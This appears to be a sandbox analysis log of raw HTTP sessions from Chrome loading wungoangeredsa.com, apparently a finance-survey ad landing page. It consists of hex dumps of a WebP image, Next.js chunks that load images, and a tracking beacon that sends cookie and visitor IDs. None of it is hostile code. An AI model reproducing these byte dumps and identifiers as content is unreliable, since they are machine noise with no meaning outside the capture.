                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417abaa142b5-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC881INData Raw: 52 49 46 46 0a 2d 00 00 57 45 42 50 56 50 38 20 fe 2c 00 00 30 14 01 9d 01 2a 00 02 00 02 3e 6d 32 92 46 a4 23 21 a1 2d 73 ba 80 80 0d 89 67 40 c4 a7 69 c7 6e 57 f9 df af ae 0f ea 25 17 f9 42 4a 37 57 e9 c2 16 fd 6b e2 cf 81 1a cf fa 07 2a ae 35 fd 0b fc c7 e6 ff f6 6f 44 ff 96 f0 ed f0 cf db bf 61 9f e9 df e5 be df 3d c0 3b e7 7f cf a5 8f f1 1f fa 9e 4d ff 46 be 25 fd 28 f6 75 fd 0a f5 ef cc 09 e9 3b f8 0f fc 9f e2 3f d4 f3 9e 7f 0e fd 9c e0 00 ec e6 84 57 7f 42 26 1b 5e ea 66 f6 ff e8 fe e0 a7 ed 1f 9c cf 8d fe bb ff 63 fc 3f 93 bf 91 7d 2b fb af f0 3f e3 39 78 7a a7 f9 7e 2e ff 8f 66 43 fc 4f d9 6f 40 7f 0f fa 87 f5 2f ff 51 c9 77 e6 fa 1e fd 83 8d 1e 5d 78 c4 f2 e9 1d 1f fd af d9 ef 22 7f 57 62 07 cd 5f 42 ba 5b 20 04 ad 45 59 74 43 6b 76 0f 28 34 f6
                                                                                                          Data Ascii: RIFF-WEBPVP8 ,0*>m2F#!-sg@inW%BJ7Wk*5oDa=;MF%(u;?WB&^fc?}+?9xz~.fCOo@/Qw]x"Wb_B[ EYtCkv(4
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 16 24 cf 24 f4 ce a0 43 25 da e8 6b 6d 66 db 90 84 fc d0 86 0f 2b 74 a9 a1 a9 03 d0 e5 e3 5a 6c dc d9 3d 07 40 30 8b 06 47 49 91 0a 29 74 06 01 70 aa 4a 32 67 dc e4 d1 51 14 91 00 1d 93 a2 37 74 06 ed 16 c6 23 00 b1 bf 65 12 76 45 19 ec 4c 9d b3 76 ab 8a 93 6a 07 a4 49 f2 0c ce 21 4b 2f e3 97 55 a5 5a cf c1 51 58 28 4c 14 21 05 db c1 81 bf ff 4f 19 4a 04 9e be 34 00 80 7f fd 17 e3 5b 93 e5 72 72 0b 94 8a 5c 46 a0 75 b8 d4 c9 c8 3e 56 ee ab f7 0c 10 8f 29 b6 73 ea 0f df f9 9b 90 10 fb c4 e2 b3 db 6e 6e 51 0d 24 5e 53 9c aa 7e 28 73 9d 5a 9f 90 34 04 09 47 d0 87 5b 33 97 86 fa 9e 85 6c 6a 0f 56 11 20 12 db 03 58 b9 00 5a dd 80 c8 89 e2 7a a7 35 47 15 e4 ba 95 18 cb c1 6a 36 51 8c 4c ba 9a 82 25 c4 97 e2 0d 9f 53 ec e8 22 52 38 e9 17 00 27 56 1b 0d 7b 58 12
                                                                                                          Data Ascii: $$C%kmf+tZl=@0GI)tpJ2gQ7t#evELvjI!K/UZQX(L!OJ4[rr\Fu>V)snnQ$^S~(sZ4G[3ljV XZz5Gj6QL%S"R8'V{X
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 12 cb 4a a5 5a 3c 36 3b 52 88 fe 44 a6 1f 6d a4 4b 7e a3 fb 7e 47 3e ac 98 e0 70 69 ce 47 e3 67 74 a6 ea a4 43 f8 dc 7d ef 23 8e c5 bb d8 99 95 9c 14 73 9d 71 ae 4e 63 a9 57 f3 11 88 5c 80 19 d8 80 be 91 4b ba 33 00 fb 6b a0 c2 13 bb 59 3c 7f 3b cd 76 4c 57 6d ff e7 bf 46 e6 9e 6a d6 dc 6a ae ff 1e 46 ce 34 60 d2 0f ff aa 10 67 39 5a 34 56 b9 df 2e b3 3a 31 eb aa 62 44 e0 31 2a 96 ab af 25 4b 1a 28 7d a7 fe 7b ba b5 1e c9 4f aa 8c ce 69 82 00 4e 0a d6 aa 2d b1 d0 24 8d d4 50 9c 0b d0 87 a2 eb 41 52 83 1e 00 14 9d ae 1a 32 d6 c0 ef 73 bb 46 d5 5c ab 24 d2 0d 15 ec 62 62 e5 f0 fe 11 d9 9a be 5b 90 a3 e3 fe 36 de 12 cd 35 f1 0f d8 f8 8b fb 9b 23 7e 42 cc dd ee 2e ea ae b0 0b b1 f7 8a 40 00 21 c7 68 f1 a8 55 78 5b f0 59 c6 1e c0 57 a5 92 12 5f e2 a4 07 77 bf
                                                                                                          Data Ascii: JZ<6;RDmK~~G>piGgtC}#sqNcW\K3kY<;vLWmFjjF4`g9Z4V.:1bD1*%K(}{OiN-$PAR2sF\$bb[65#~B.@!hUx[YW_w
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 81 e6 1b d6 15 72 bf f6 1b 2b f3 23 2b dc 61 6a b3 d0 70 b0 c3 6c b0 c8 ec a4 d6 ce c7 1f 26 52 f5 c7 03 3f a0 4b 9e a3 3d c3 ee 74 20 96 47 59 25 72 8b 8e 06 8f 84 28 b8 68 37 1c b6 e1 6f 8a 3d 50 eb 27 87 56 e5 06 1a 8b bf 1c 72 d1 4d 23 8c f3 e6 4a f8 a6 f7 fc 01 de 90 7a 84 ed 86 84 dc 52 18 9c 01 69 a4 1a 73 16 9d da 81 33 f1 38 aa 0d 46 36 fa 6e a3 74 02 be 63 cc d4 ef ce 7d 5a ce 0c 7c a0 f6 bf 72 4c 25 b5 cc 2b 53 8b f4 26 fe 09 1d 1a e8 ab 5c 0f 80 9c 73 44 ee db 70 06 5c b6 47 34 6e 30 90 d6 d9 8e a2 2a b9 cd ee d6 4a 2c 8e ab 8e 74 07 c4 b6 e0 e0 07 8e 83 0e c8 11 7a 43 46 18 e4 bd 1a bf 8b e2 84 56 91 3a 38 4a 7f e2 64 bf b4 94 26 4a 12 a3 6c 18 64 cf 55 bf aa 02 39 8c f9 79 3a 2d 98 40 5b 6b 5c 59 78 e2 04 6d 78 93 2d e1 55 68 02 cd 57 87 48
                                                                                                          Data Ascii: r+#+ajpl&R?K=t GY%r(h7o=P'VrM#JzRis38F6ntc}Z|rL%+S&\sDp\G4n0*J,tzCFV:8Jd&JldU9y:-@[k\Yxmx-UhWH
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: db e0 ea 3c 48 38 c3 9f 77 29 d8 87 6a eb 2d 72 ee 6e 6d 1c 31 a2 65 76 e4 3c 8f b5 67 30 08 be fe e8 b6 77 4a 72 a4 6a 4f e3 e6 4a 93 19 c0 94 5d 5c 40 85 ad d1 70 01 99 50 c1 b5 61 09 ae 7d b4 b2 d5 35 81 37 66 6b 51 ba 5b 54 6f dc 90 b2 48 79 b0 70 c2 22 8b f4 0a 92 15 18 7d e3 79 6b d4 35 67 59 ad af fc 93 36 1b 12 f9 ce c5 79 14 ea 25 20 e5 e1 bc 0a 9f bc 97 8b 2e 42 e4 3a e6 f1 22 cf bb d1 0d 00 24 9d 48 93 91 db cd a2 a2 ba 46 65 b0 7d 66 9b 87 3e d1 ae b1 c6 66 41 ed 49 36 19 70 26 62 e4 ba 5a 6c 4e 57 c6 59 3d a1 f3 4b 0c 95 14 ab 51 57 c9 2e 18 06 1e 9b b9 1c 08 25 be 37 cd 56 ac 76 3c 5d b1 31 04 6d 6e be ff bf 0d 04 9a 48 28 95 be 2f 51 57 d8 6b c7 05 de ea be c5 4b da ac d5 76 d3 e4 38 38 45 40 10 dc 12 1e cf 48 3a 72 e7 df 93 a7 b3 75 6f 16
                                                                                                          Data Ascii: <H8w)j-rnm1ev<g0wJrjOJ]\@pPa}57fkQ[ToHyp"}yk5gY6y% .B:"$HFe}f>fAI6p&bZlNWY=KQW.%7Vv<]1mnH(/QWkKv88E@H:ruo
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 78 bb b6 e8 3f cc 4b 77 9f 4a 99 4b 5b cb 4e af a4 d4 89 4b 4b e3 7b 94 9d 56 e7 e4 d7 a1 e4 01 96 44 2e eb ec 76 28 e4 0b 3a 50 20 c0 fc 4b 69 e2 30 a7 39 93 52 de 43 e2 70 9a e3 1b 08 91 30 fd 29 f8 05 09 90 97 64 6b 51 96 69 54 7b 10 f4 ef c3 24 46 9d ea 06 9e 59 50 8f 44 3c c0 ef 47 f4 bc 90 30 89 ba ed ce 82 96 d7 3d d7 73 11 cf 08 f0 96 e8 72 94 77 7e df 97 86 f9 d7 96 0a 00 7e 2c a7 fa 14 1e 21 fa c3 55 3d 54 41 68 5c 65 d3 08 40 95 33 93 4b 85 7b f5 f0 b3 a4 70 76 1f de fc 05 67 b2 29 e5 c3 c0 75 61 c2 b3 09 3a ee a6 a9 af 59 8c 74 8e 85 dd 58 69 30 a0 78 b7 65 28 e6 cb f7 60 11 40 54 a7 7a e6 31 4d 44 87 81 57 b7 9b bc b1 22 05 4b af a4 54 f3 ad 7b 60 6a bb 35 f3 32 31 5f bf a5 b2 b0 b8 9f 98 6d f5 61 b1 e7 de 12 63 74 3c 52 01 ae ad 57 85 28 a8
                                                                                                          Data Ascii: x?KwJK[NKK{VD.v(:P Ki09RCp0)dkQiT{$FYPD<G0=srw~~,!U=TAh\e@3K{pvg)ua:YtXi0xe(`@Tz1MDW"KT{`j521_mact<RW(
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 94 22 69 d9 31 00 cc 9e c7 db 0d 92 12 87 dd 24 6c cb 8c 8c 5e ce 68 a3 66 66 45 2c 45 99 dd 90 e2 bb 2d a3 bd 26 5a ae 53 c7 11 1c bd da 3b 05 c6 74 60 42 d1 f2 32 50 68 e6 c1 d9 96 98 b0 da e9 d4 aa 62 4f 85 9e 4b 40 c2 a1 29 f3 1f a6 b8 6a 9f dc c2 65 fb 5e 0b 66 35 e9 45 7b f2 bc 1a 72 d9 68 8e a1 e9 d8 72 66 a9 96 7c 3b 17 04 82 88 2a aa fd 99 61 5a 33 9e e2 2c c7 15 ed 99 6d 0f 42 83 ac c7 ac b0 18 76 22 12 50 61 3c 75 75 71 bd 54 ef 9d 4e 1f d0 26 d8 d9 64 26 b9 dd a8 43 55 e6 57 66 cf fd 2c 60 a4 9c 50 6e 33 eb 1c 8e e8 8e 07 33 90 52 46 d4 00 52 ed a2 2f bd 14 5e e3 41 c2 1c 52 fd aa 47 49 4c bf 08 5a fd 96 af 70 3d bb ff 8d 4b 8a 19 26 80 60 5d e1 be 34 40 05 c4 ff 70 48 85 93 d1 c3 10 7b 8e 3e 62 a7 ac 19 68 36 af dc c6 ad 21 50 9b d7 ed dc 77
                                                                                                          Data Ascii: "i1$l^hffE,E-&ZS;t`B2PhbOK@)je^f5E{rhrf|;*aZ3,mBv"Pa<uuqTN&d&CUWf,`Pn33RFR/^ARGILZp=K&`]4@pH{>bh6!Pw
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 98 13 8c ef 65 ad c6 1e 73 87 fa 53 7e ac e5 50 e2 0e b6 87 83 0f 16 94 0d 27 2b 36 32 41 35 50 09 42 78 48 6d 82 84 ca 52 b2 7f 59 1d c4 45 42 d2 6d 4e 78 dc 3d 53 5a 5d e6 e4 37 89 08 c4 89 97 ad 4f 8b d6 bf c7 2a 64 c7 16 ad 1a 97 ef 07 5a 87 9e cf 9d e9 f6 18 dc 4a ca 39 57 68 2b 87 93 93 fa a7 07 a2 78 2f 47 bd a8 26 43 96 e8 bd 88 df ec 78 60 be e9 d4 39 38 19 60 e4 46 8f 69 95 3a 8c ac 95 45 5d a2 8d 03 45 c4 ab ad 7b 13 57 11 72 59 fe cf 77 b1 49 c1 6b b4 23 2d e8 6a 46 8e 2f ac fd 6b e6 29 eb 1a 8d da 55 8a 0e 74 e4 63 b5 f7 11 fa 1d fd 37 89 b5 b7 ee d9 72 24 b5 40 eb b3 1f f6 a6 18 ce 31 21 74 41 eb 1e df 2f 5e 3d 50 bf 6b 69 b7 f8 89 10 7b 33 dc c5 73 b8 c8 30 64 9d 0d 3d 66 ad e2 25 0f b2 5d 03 0b 97 21 fe 80 62 e6 c4 48 0c f3 9b 6c 2a dd 5e
                                                                                                          Data Ascii: esS~P'+62A5PBxHmRYEBmNx=SZ]7O*dZJ9Wh+x/G&Cx`98`Fi:E]E{WrYwIk#-jF/k)Utc7r$@1!tA/^=Pki{3s0d=f%]!bHl*^
                                                                                                          2025-01-06 11:09:25 UTC1074INData Raw: 85 2a 69 89 dc 1e 5a d4 66 98 eb d7 28 85 af 38 c1 84 29 95 6c 58 d6 2c ec 04 e9 b6 c8 b1 1c f1 5a ad 3d a2 2f 23 77 bf 57 0b e1 75 b2 27 33 71 f4 61 97 79 56 e9 b2 c8 26 a6 7b 48 92 fc 59 ce 94 62 20 54 7b 44 7c 46 be 56 03 71 e8 2c 99 7c f6 34 2e ce 65 91 22 c4 cb 42 f3 8c 02 72 be dc a8 36 3a d2 72 c9 94 80 b0 de 87 c8 71 b1 c5 ff c3 5f 10 ad d1 ac 6f c7 81 35 33 39 b1 2b 61 e0 40 4b 78 4c 85 00 44 38 66 ec 5f 35 41 cf 0b e2 0e 60 13 26 13 c6 16 56 b1 e9 d8 70 fc 4c ce 44 d3 4e 00 9b 33 2e fb fb a0 8c 58 f5 34 f5 01 17 a7 7c b0 3b 0e e2 b8 7d 74 20 ee 1f 98 7d be 03 2d d5 b9 79 8f 97 97 91 cc 52 55 91 84 45 07 ba da 00 04 b6 69 68 44 0d c1 e4 ee 89 6e 09 2a 2a 89 32 a8 c8 3e 25 1f 56 da 06 c1 0e 85 79 fe 56 cf 58 f6 0c 85 ea 84 76 9d 5a 20 26 a2 69 5c
                                                                                                          Data Ascii: *iZf(8)lX,Z=/#wWu'3qayV&{HYb T{D|FVq,|4.e"Br6:rq_o539+a@KxLD8f_5A`&VpLDN3.X4|;}t }-yRUEihDn**2>%VyVXvZ &i\


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          109192.168.2.450163104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-178"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417b6ccb41f2-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC383INData Raw: 31 37 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 33 37 31 38 5d 2c 7b 37 33 37 31 38 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 34 38 2e 35 38 34 63 34 33 35 33 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 51 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 67 41 41 41 44 51 41 51
                                                                                                          Data Ascii: 178"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73718],{73718:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_48.584c4353.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlQAAABXRUJQVlA4IEgAAADQAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          110192.168.2.450161104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417b6821436a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 37 37 37 30 5d 2c 7b 36 37 37 37 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 34 37 2e 63 65 32 33 38 64 63 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[67770],{67770:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_47.ce238dc0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          111192.168.2.450162104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-174"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417ba9c8efa5-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC379INData Raw: 31 37 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 34 34 38 37 5d 2c 7b 38 34 34 38 37 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 33 33 2e 62 61 34 36 38 64 31 31 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 49 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 59 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 174"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[84487],{84487:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_33.ba468d11.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlIAAABXRUJQVlA4IEYAAADwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          112192.168.2.450165104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC677OUTPOST /sync-metrics HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 572
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://wungoangeredsa.com
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC572OUTData Raw: 5b 7b 22 65 76 65 6e 74 22 3a 22 6c 6f 61 64 22 2c 22 75 73 69 64 22 3a 22 31 39 34 33 62 34 65 31 35 33 62 32 35 65 36 30 39 66 38 65 66 64 35 22 2c 22 73 75 62 5f 69 64 22 3a 22 39 30 30 30 39 30 31 39 32 39 35 39 39 31 30 32 33 33 22 2c 22 6f 61 69 64 22 3a 22 31 7a 79 32 38 30 35 30 6b 6f 76 62 66 79 79 63 34 79 7a 34 67 73 71 36 32 70 6b 6d 61 78 68 62 22 2c 22 74 65 65 6e 61 67 65 22 3a 30 2c 22 61 70 70 5f 6e 61 6d 65 22 3a 22 64 6f 22 2c 22 6c 61 6e 64 69 6e 67 5f 6e 61 6d 65 22 3a 22 66 69 6e 61 6e 63 65 2d 73 75 72 76 65 79 22 2c 22 65 76 65 6e 74 5f 73 6f 75 72 63 65 22 3a 31 2c 22 79 6d 69 64 22 3a 22 32 64 65 37 31 38 22 2c 22 72 65 71 75 65 73 74 5f 76 61 72 22 3a 22 36 31 35 2d 35 33 38 62 64 30 64 39 22 2c 22 6c 61 6e 64 69 6e 67 5f 64 6f
                                                                                                          Data Ascii: [{"event":"load","usid":"1943b4e153b25e609f8efd5","sub_id":"900090192959910233","oaid":"1zy28050kovbfyyc4yz4gsq62pkmaxhb","teenage":0,"app_name":"do","landing_name":"finance-survey","event_source":1,"ymid":"2de718","request_var":"615-538bd0d9","landing_do
                                                                                                          2025-01-06 11:09:25 UTC924INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Content-Length: 17
                                                                                                          Connection: close
                                                                                                          X-Trace-Id: c4535313205f85f2b115be3b4ed1c1e0
                                                                                                          Accept-Ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model
                                                                                                          Access-Control-Allow-Origin: https://wungoangeredsa.com
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, baggage, sentry-trace
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
                                                                                                          Timing-Allow-Origin: *
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417bcf0cf02d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC17INData Raw: 7b 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 7d
                                                                                                          Data Ascii: {"success": true}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          113192.168.2.450164104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
